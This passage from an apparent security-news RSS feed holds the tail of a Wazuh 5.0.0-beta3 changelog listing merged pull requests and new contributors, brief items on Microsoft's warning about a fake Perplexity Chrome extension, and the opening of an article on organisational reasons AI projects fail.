<li>Eliminate TOCTOU races in healthcheck file operations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736827470" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37160" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37160/hovercard" href="https://github.com/wazuh/wazuh/pull/37160">#37160</a></li>
<li>Sca file policy block standardization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Johnng007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Johnng007">@Johnng007</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4743999327" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37179" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37179/hovercard" href="https://github.com/wazuh/wazuh/pull/37179">#37179</a></li>
<li>Bind agent index selection and scope deletes by cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735319890" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37154" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37154/hovercard" href="https://github.com/wazuh/wazuh/pull/37154">#37154</a></li>
<li>Add Null Check for Inode and Dev Fields in FIM Whodata Event Handler by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4766388009" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37245" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37245/hovercard" href="https://github.com/wazuh/wazuh/pull/37245">#37245</a></li>
<li>Docs/6764 logcollector whats new 5.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721987109" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37056" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37056/hovercard" href="https://github.com/wazuh/wazuh/pull/37056">#37056</a></li>
<li>Repair RPM builder toolchain downloads by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728182443" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37130" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37130/hovercard" href="https://github.com/wazuh/wazuh/pull/37130">#37130</a></li>
<li>Add cluster name validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753677014" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37238" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37238/hovercard" href="https://github.com/wazuh/wazuh/pull/37238">#37238</a></li>
<li>Add cluster readiness endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728071822" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37129" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37129/hovercard" href="https://github.com/wazuh/wazuh/pull/37129">#37129</a></li>
<li>Defer cluster payload buffer allocation until data is received by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4769731908" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37280" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37280/hovercard" href="https://github.com/wazuh/wazuh/pull/37280">#37280</a></li>
<li>Indexer connector bulk size and flush interval configurable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736764012" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37158" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37158/hovercard" href="https://github.com/wazuh/wazuh/pull/37158">#37158</a></li>
<li>Enable shared-password enrollment by default by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4734529271" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37151" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37151/hovercard" href="https://github.com/wazuh/wazuh/pull/37151">#37151</a></li>
<li>Fix unit test workflow paths and report handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4777938328" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37317" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37317/hovercard" href="https://github.com/wazuh/wazuh/pull/37317">#37317</a></li>
<li>Migrate agent + server CI artifacts to S3 — 4.14.7 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643824078" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5300" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5300/hovercard" href="https://github.com/wazuh/wazuh/issues/5300">#5300</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643806955" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5298" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5298/hovercard" href="https://github.com/wazuh/wazuh/issues/5298">#5298</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4745105538" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37186" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37186/hovercard" href="https://github.com/wazuh/wazuh/pull/37186">#37186</a></li>
<li>Handle eol amazon inspector classic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746717311" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37194" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37194/hovercard" href="https://github.com/wazuh/wazuh/pull/37194">#37194</a></li>
<li>Fix wazuh-modulesd missing after macOS agent restart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4695257310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37020" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37020/hovercard" href="https://github.com/wazuh/wazuh/pull/37020">#37020</a></li>
<li>Fix test_worker failing unit test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4777598945" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37314" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37314/hovercard" href="https://github.com/wazuh/wazuh/pull/37314">#37314</a></li>
<li>Improve log messages  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671655779" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36876" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36876/hovercard" href="https://github.com/wazuh/wazuh/pull/36876">#36876</a></li>
<li>Improve changelog format by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4784576201" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37332" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37332/hovercard" href="https://github.com/wazuh/wazuh/pull/37332">#37332</a></li>
<li>Lower log level of transient cluster IPC failures (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768765565" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37277" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/37277/hovercard" href="https://github.com/wazuh/wazuh/issues/37277">#37277</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768737167" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37276" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/37276/hovercard" href="https://github.com/wazuh/wazuh/issues/37276">#37276</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4783970019" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37326" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37326/hovercard" href="https://github.com/wazuh/wazuh/pull/37326">#37326</a></li>
<li>Fix TypeError when sorting agents by version with empty version strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4779868587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37323" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37323/hovercard" href="https://github.com/wazuh/wazuh/pull/37323">#37323</a></li>
<li>Migrate agent + server CI artifacts to S3 — 5.0.0 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643824078" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5300" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5300/hovercard" href="https://github.com/wazuh/wazuh/issues/5300">#5300</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643806955" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5298" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5298/hovercard" href="https://github.com/wazuh/wazuh/issues/5298">#5298</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744978467" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37185" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37185/hovercard" href="https://github.com/wazuh/wazuh/pull/37185">#37185</a></li>
<li>Validate asset resource names before policy promotion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741678194" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37172" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37172/hovercard" href="https://github.com/wazuh/wazuh/pull/37172">#37172</a></li>
<li>Revert wazuh-server indexer credentials and propagate log context in indexer connector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4784669937" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37333" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37333/hovercard" href="https://github.com/wazuh/wazuh/pull/37333">#37333</a></li>
<li>Add VD readiness status HTTP endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753007421" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37213" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37213/hovercard" href="https://github.com/wazuh/wazuh/pull/37213">#37213</a></li>
<li>Use github.workspace for wodles report paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787326775" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37342" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37342/hovercard" href="https://github.com/wazuh/wazuh/pull/37342">#37342</a></li>
<li>Skip FIM whodata cases on the tier-2 Linux job (CodeBuild) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4771331061" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37291" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37291/hovercard" href="https://github.com/wazuh/wazuh/pull/37291">#37291</a></li>
<li>Migrate 4.x Windows test runners to AWS CodeBuild  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746542396" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37193" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37193/hovercard" href="https://github.com/wazuh/wazuh/pull/37193">#37193</a></li>
<li>Lower log level of transient queue send failures in modulesd by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788115193" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37345" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37345/hovercard" href="https://github.com/wazuh/wazuh/pull/37345">#37345</a></li>
<li>Add changelog check workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787529876" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37343" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37343/hovercard" href="https://github.com/wazuh/wazuh/pull/37343">#37343</a></li>
<li>Add changelog check workflow for 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788939423" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37351" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37351/hovercard" href="https://github.com/wazuh/wazuh/pull/37351">#37351</a></li>
<li>Retry <code>OS_SendUnix</code> on <code>ENOBUFS</code> to stop dropping binary sync messages on macOS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788850753" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37349" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37349/hovercard" href="https://github.com/wazuh/wazuh/pull/37349">#37349</a></li>
<li>change: Allow null root_decoder as alias of empty string on policy cr… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788261828" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37347" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37347/hovercard" href="https://github.com/wazuh/wazuh/pull/37347">#37347</a></li>
<li>Fix eBPF FIM whodata for Amazon Linux by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692775155" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37014" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37014/hovercard" href="https://github.com/wazuh/wazuh/pull/37014">#37014</a></li>
<li>Merge 4.14.6 into 4.14.7 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4792934428" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37358" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37358/hovercard" href="https://github.com/wazuh/wazuh/pull/37358">#37358</a></li>
<li>Bump 5.0.0 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4794415837" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37371" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37371/hovercard" href="https://github.com/wazuh/wazuh/pull/37371">#37371</a></li>
<li>Merge 4.14.7 into 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4793306985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37360" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37360/hovercard" href="https://github.com/wazuh/wazuh/pull/37360">#37360</a></li>
<li>Migrate remaining CI artifacts to S3 for the 5.0.0 branch (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="454578666" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/3502" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/3502/hovercard" href="https://github.com/wazuh/wazuh/pull/3502">#3502</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788864035" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37350" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37350/hovercard" href="https://github.com/wazuh/wazuh/pull/37350">#37350</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539151411" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36518" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36518/hovercard" href="https://github.com/wazuh/wazuh/pull/36518">#36518</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ripdiegozz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ripdiegozz">@Ripdiegozz</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505228985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36357" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36357/hovercard" href="https://github.com/wazuh/wazuh/pull/36357">#36357</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adman23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adman23">@Adman23</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580559348" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36750" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36750/hovercard" href="https://github.com/wazuh/wazuh/pull/36750">#36750</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jcorredor-spec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jcorredor-spec">@jcorredor-spec</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521476970" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36402" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36402/hovercard" href="https://github.com/wazuh/wazuh/pull/36402">#36402</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/wazuh/wazuh/compare/v5.0.0-beta2...v5.0.0-beta3"><tt>v5.0.0-beta2...v5.0.0-beta3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Warns: Fake Perplexity Extension Abused Chrome Search Features]]></title>
<description><![CDATA[Microsoft found a fake Perplexity AI Chrome extension that rerouted searches through attacker servers. Here’s what users should check now. The post Microsoft Warns: Fake Perplexity Extension Abused Chrome Search Features appeared first on TechRepublic. This article has been indexed…
Read more →
T...]]></description>
<link>https://tsecurity.de/de/3640921/it-security-nachrichten/microsoft-warns-fake-perplexity-extension-abused-chrome-search-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640921/it-security-nachrichten/microsoft-warns-fake-perplexity-extension-abused-chrome-search-features/</guid>
<pubDate>Thu, 02 Jul 2026 13:23:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft found a fake Perplexity AI Chrome extension that rerouted searches through attacker servers. Here’s what users should check now. The post Microsoft Warns: Fake Perplexity Extension Abused Chrome Search Features appeared first on TechRepublic. This article has been indexed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/microsoft-warns-fake-perplexity-extension-abused-chrome-search-features/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/microsoft-warns-fake-perplexity-extension-abused-chrome-search-features/">Microsoft Warns: Fake Perplexity Extension Abused Chrome Search Features</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Warns: Fake Perplexity Extension Abused Chrome Search Features]]></title>
<description><![CDATA[Microsoft found a fake Perplexity AI Chrome extension that rerouted searches through attacker servers. Here’s what users should check now.
The post Microsoft Warns: Fake Perplexity Extension Abused Chrome Search Features appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3640863/it-nachrichten/microsoft-warns-fake-perplexity-extension-abused-chrome-search-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640863/it-nachrichten/microsoft-warns-fake-perplexity-extension-abused-chrome-search-features/</guid>
<pubDate>Thu, 02 Jul 2026 13:02:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft found a fake Perplexity AI Chrome extension that rerouted searches through attacker servers. Here’s what users should check now.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-fake-perplexity-chrome-extension-searches/">Microsoft Warns: Fake Perplexity Extension Abused Chrome Search Features</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[4 reasons AI projects fail that have nothing to do with technology]]></title>
<description><![CDATA[Having worked with dozens of companies in various stages of AI adoption, I’ve had a front-row seat to the myriad reasons (and sometimes excuses) why AI projects fail to launch, fail to make it past pilots or fail to deliver business value and ROI.



While every organization’s circumstances are u...]]></description>
<link>https://tsecurity.de/de/3640730/it-nachrichten/4-reasons-ai-projects-fail-that-have-nothing-to-do-with-technology/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640730/it-nachrichten/4-reasons-ai-projects-fail-that-have-nothing-to-do-with-technology/</guid>
<pubDate>Thu, 02 Jul 2026 12:03:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Having worked with dozens of companies in various stages of AI adoption, I’ve had a front-row seat to the myriad reasons (and sometimes excuses) why AI projects fail to launch, fail to make it past pilots or <a href="https://complexdiscovery.com/why-95-of-corporate-ai-projects-fail-lessons-from-mits-2025-study/" rel="nofollow">fail to deliver</a> business value and ROI.</p>



<p>While every organization’s circumstances are unique, the root causes are often surprisingly familiar. Like so many technological leaps that came before AI, fear, culture and competing priorities are often the biggest barriers to enterprise success.</p>



<h2 class="wp-block-heading">1. Fear of job replacement</h2>



<p>It’s no secret that employees across industries, roles and seniority levels can see the writing on the wall: AI will affect their careers. According to <a href="https://www.pewresearch.org/social-trends/2025/02/25/u-s-workers-are-more-worried-than-hopeful-about-future-ai-use-in-the-workplace/?utm_source=chatgpt.com">Pew Research</a>, 52% of workers are concerned about AI’s future impact on the workplace, and 32% believe it will reduce job opportunities in the long run.</p>



<p>As a result, there may be resistance, or just a lack of enthusiasm, to AI initiatives. This can cause AI success to stall in the form of slow adoption, low engagement and knowledge hoarding. One <a href="https://writer.com/blog/enterprise-ai-adoption-2026/" rel="nofollow">Writer study</a> even found that 29% of employees (and 44% of Gen Z) admit to sabotaging their employer’s AI strategy.</p>



